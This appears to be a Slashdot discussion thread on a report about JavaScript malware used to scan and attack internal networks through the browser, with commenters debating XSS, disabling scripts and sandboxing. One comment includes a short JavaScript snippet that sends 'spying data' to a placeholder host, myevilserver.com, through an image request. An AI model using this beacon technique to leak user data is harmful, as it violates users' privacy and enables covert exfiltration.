JavaScript Malware Open The Door to the Intranet

An anonymous reader writes "C|Net is reporting that JavaScript malware is opening the door for hackers to attack internal networks. During the Black Hat Briefings conference Jeremiah Grossman (CTO, WhiteHat Security) '...will be showing off how to get the internal IP address, how to scan internal networks, how to fingerprint and how to enter DSL routers ... As we're attacking the intranet using the browser, we're taking complete control over the browser.' According the the article, the presence of cross-site scripting vulnerabilities (XSS) dramatically increase the possible damage that can be caused. The issue also not which-browser-is-more-secure, as all major browsers are equally at risk. Grossman says 'The users really are at the mercy of the Web sites they visit. Users could turn off JavaScript, which really isn't a solution because so many Web sites rely on it.'"

Simple fix to an obvious problem

[pieterh]

Giving JavaScript the power to do random network accesses may make AJAX possible, but code running in my browser has no business accessing my local intranet. For that matter, I'm uncomfortable with JavaScript applications 'phoning home' without my knowledge.

So, the fix is to treat all attempts by JavaScript in a browser as 'hostile until proven otherwise', and to ask for user confirmation when such attempts happen. Put a firewall around the browser and treat any code running in it as dangerous by default.

I predict 2 weeks before there's a FireFox update for this, and 2 years before MSIE fixes the problem.

How's this news?

[Anonymous Coward]

A portscanner in javascript is trivial and it runs on the client machine behind the corporate firewall. This isn't news, this has been common knowledge for ever. This is why javascript is disabled throughout any organization that takes security seriously. I find it amusing that this only gets planted in the news when certain large tech companies are pushing ajax to replace desktop apps.

It's not just javascript, flash content, activeX and java applets should all be disabled site-wide. Any network admin that leaves js enabled in browsers (acrobat reader etc) should probably seek employment in some other field. Anything less is irresponsible!

Re:Simple fix to an obvious problem

[Goaway]

document.createElement("img");
img.src="http://myevilserver.com/phonehome.cgi?evi lspyingdata="+encodeURIComponent(evilspyingdata);
document.body.appendElement(img);

Oops! I just phoned home without using XMLHttpRequest! How are you going to firewall that one out?

Re:NoScript

[Anonymous Coward]

The problem is not necessiarly the web browsers (and most don't even use Firefox let alone have even heard of that that extension). The problem is the websites that don't properly take steps to protect against XSS (e.g. HTMLencode user input).

Most recently we saw this problem in Netscape's portal.

http://blog.outer-court.com/archive/2006-07-26-n73 .html [outer-court.com]

Developers need to start thinking not only about how to solve the particular business problem but also about how their code could be potentially abused by attackers and take active steps to mitigate that risk.

Re:Simple fix to an obvious problem

[Ougarou]

As said: the problem is not the XMLHttpRequest that can be done: this is site bound in Firefox. (I think it's domain bound, not site bound actually, but ok)

The problem is the ability of a homepage to be spread over different servers and locations. The only solution I see is getting images to be domain bound to.

This solution will only work if it is set on all possible media that is embedded in the page, allowing only relative links for embedded media. Of course, this would totally destroy most parts of the internet.

What I don't understand is why and how Javascript can get my local IP address: who even needed that to be implemented?

WMVs

[CosmeticLobotamy]

This is slightly off-topic, but it's kind of relevent to the solution of turning javascript off. Can anyone explain to me why javascript is required in Firefox to open a .wmv file (in windows, obviously)? And more importantly, what bug makes Firefox crash about 33% of the time when visiting a site that has one on it when javascript is disabled? What are the odds that bug is overflow exploitable?

Re:A solution to this problem.

[Goaway]

Except that, you know, maybe they want to actually use JavaScript apps on their intranet?

Configure which sites get javascript?

[Anonymous Coward]

I have been asking for years why we can't disable javascript for all but trusted sites (in phoenix/firefox/etc) via a config facility.. The default when browsing should be OFF.

Websites need to stop using javascript for conveying simple information. That Flash crap too. Most people just laugh when I say javascript is a security hole.

Re:Configure which sites get javascript?

[Anonymous Coward]

Most people just laugh when I say javascript is a security hole.

Especially prepare to be belittled by those with vested interests in web2.0(TM). These people know full well that client-side scripting is security problem #1 but would prefer if the truth never got out.

Here comes another flamebait mod!

Javascript Haters Society

[bateleur]

So in response to a post saying a particular technology has security holes, the consensus "solution" is not to use that technology?

That seems weak to me. By all means propose replacement solutions that do the same job, but by saying "don't use it" all you're really doing is saying "I personally have little use for it".

Sysadmins should all disable Javascript?! Fine, go ahead, I'll move to a company with less demanding security requirements. You'll find your network's impressively secure once there are no users left.

Doing a quick parse of the article...

[Skiron]

...I think this is only relevant to IE and MS [again]. As to sending commands to a 'router' to turn on wireless (if I even had a router that had wireless) is pants unless the 'owner' of the router wasn't the person using it (i.e. an ISP package). The interface must be open to allow this to happen.

So, the problem is with MS (again) and 'harry home owner' type people that don't have a clue about anything, so just run with the flow [OK].

Re:NoScript

[passthecrackpipe]

Dude, you must be a troll, but I'll bite. That is just such a load of bullshit, you could *never* be an IT consultant. First of all, if you are coding, you aren't a consultant - a consultant "consults" i.e. you advise the customer on the best course of action to achieve a certain goal. This may be architectural, infrastructure, security, or any other field, but it is *advise* - a good consultant is too *expensive* to be sitting there knocking out code. If your customer can afford to have you write (evidently crappy) code on his dime, you aren't a consultant, you are a tech/engineer, with delusions of grandeur.

Having said that, your attitude is simplistic, and hints of a general lack of intelligence. Whatever kind of engineer you think you may be, you suck at it. I can tell you this simply from looking at your post. Security should be a pervasive part of all you do, whether you are a dev, a server wrangler, or whatver. Saying "we don't have the knowledge or time to make sure its secure" is like a pilot saying "I don't know how close to ground I am, I'm busy enough keeping this plane in the air without having to worry abou...." Cue planecrash.

Please kill JavaScript.

[Anonymous Coward]

The vast, vast majority of exploits involve JavaScript in one way or another. If it were possible to just "turn off" JavaScript world-wide overnight, the number of exploits would drop down substantially. Of course you would still have the "stupid user" problem, but you can only do so much to combat that.

As far as browsers are concerned, a large percentage of exploits are being written by / for criminal elements for profit. To this end, they maximize their profit potential by targeting the most prolific browser. For now, FireFox and others are relatively safe. We have seen a few things come out lately, but they are really just toys compared to what is out there for Internet Explorer. These people writing the exploits are, unfortunately, rather smart and clever. When it becomes econically feasible for them to target FireFox / Mozilla / whatever, make no mistake about it: they will. That is when we will see how secure that software really is.

This is where people bring up the IIS vs Apache argument. My only answer to that is that there is little money to be made in compromising web servers. There are a few cases of corporate espoionage, but most of the time it is ego-driven: defacement, spreading worms, etc. A competent webadmin will eventually discover the breach and fix the system, so there is not a long window of opportunity. Compromising millions of home users' PCs without them even knowing it is much better profit-wise; you can spam the shit out of anything pretty much with impunity, and people will pay you good money to do it. So these kinds of people target what they are familiar with: Microsoft. I think compatibility also plays a role. Any Windows server running IIS can run any Windows binary. This is patently untrue of Linux servers running Apache; there are so many different combinations of distributions, libraries, and architectures that binary compatibility is very small if it even exists. Microsoft is an easy target because it is such a monoculture.

Re:Simple fix to an obvious problem

[roman_mir]

this is not insightful, it's silly. This is not even about JAVASCRIPT. An HTML page can access resources from anywhere on the web. And so if JAVASCRIPT is used to access one of those resources (an http request, as in HTML IMAGE tag for example,) then this problem cannot be fixed at JAVASCRIPT level.

An HTML page can access an image on a third party server via a normal html tag, a javascript can facilitate that access, that's about it. In that http request parameters can be hidden that provide information about your session.

The trick with JAVASCRIPT scanning your local network is actually this exact feature: a browser allowing HTML page to load resources from anywhere on the network. JAVASCRIPT is used to manipulate the DOM of the HTML, the GUI event model and the http requests. So the fundamental question is this: should and HTML page be allowed in principle to access resources from third party servers and not from its own server.

But then you are questioning the entire Hyper Text idea - the linking of the Internet.

This most certainly will not be fixed in the next release of ANY browser.

Re:NoScript

[BalanceOfJudgement]

What I don't understand is why the other two who replied to you had to be so visceral about it. A simple "No, no, here's what you can do to make sure things are secure" would have sufficed, but instead one had to resort to calling you a troll and the other had to call you a con.

Alas, I'm realizing that is a common experience on Slashdot. I always imagined geeks who were full of themselves, I guess I had to come here to really find them.

Anyway, just brush that off, take the good from what they had to say, and leave it at that.

Really, why people need to think of this place as a place to fight...

You don't need it - you want it.

[gnuman99]

You don't need javascript to open a link to another page. You don't need javascript to open an image in a gallery. You don't need javascript to submit a username and password. You just don't need it.

You don't need it - you want it. You want it to make the entire web experience better.

From a security standpoint, everyone should be on lynx or similar browser. From the user standpoint, Javascript is essential (see maps.google.com, or gmail) for a good web experience. Images are fundamental. Web is not static HTML any more. We now live in the world of DHTML and security is just going to have to deal with it.

Javascript is broken if it allows you to access other than non-remote resources (ie. from original website) and some settings available to it from the browser (windows size, etc..). That's what it is there for and other uses should be disabled. We already see it with the JS popup blockers. Similar security for network accesses should suffice.

Similarly with Java, Flash and other things.

Re:Simple fix to an obvious problem

[Goaway]

Even if people should ignore the fact that this breaks half the pages on the internet, and turn it on, I can just use an iframe for the attack instead. Or a style tag. And so on, and so on.

Re:NoScript

[mattyrobinson69]

To provide a decent UI for the user, you have to sometimes 'require' JS, for example, if you want to maintain a session when the user isn't actively clicking on links (especially when you need to know who is actually online, eg: see my link), you need to use xmlrpc (sometimes meta refresh just wont do).

If you want a 'You have recieved mail' popup, you need JS, same with drag/drop, client side validation (along with server side obviously), client side updates of something that is happening server side (eg: the telephone call you requested is now being dialed, was answered, was disconnected, etc).

The WWW would be much worse off without Javascript, as much as I hate the language. XSS could be prevented if JS could only be included by a HTTP header, such as:

link-file: javascript.js
link-file: js2.js

etc, but we're a good decade late for that to become mandatory.

Fix the stupid bugs

[Myria]

JavaScript is not *supposed* to be able to do bad things like this. It has many safeguards built into it to avoid this.

The real problem is that the browsers have bad code in their JavaScript implementations. This is what needs to be fixed.

Also, web browsers probably should run using CreateRestrictedToken. I wish web browsers would run with lower privilege than your normal user applications. You could have 2 processes, one that runs at normal privilege and one that runs as a restricted token. Almost the entire browser would be under the restricted token. Really, the only exceptions should be when downloading or uploading files, at the user's request of course. Such things can be done over interprocess communication with a well-defined and hardened interface.

I guess that the big problem is that NT and Linux don't really have a way to do this. The only way I can think of this working is for the browser to run as a separate user account. That requires administrator access to set up, as does running a second process as a different user.

Melissa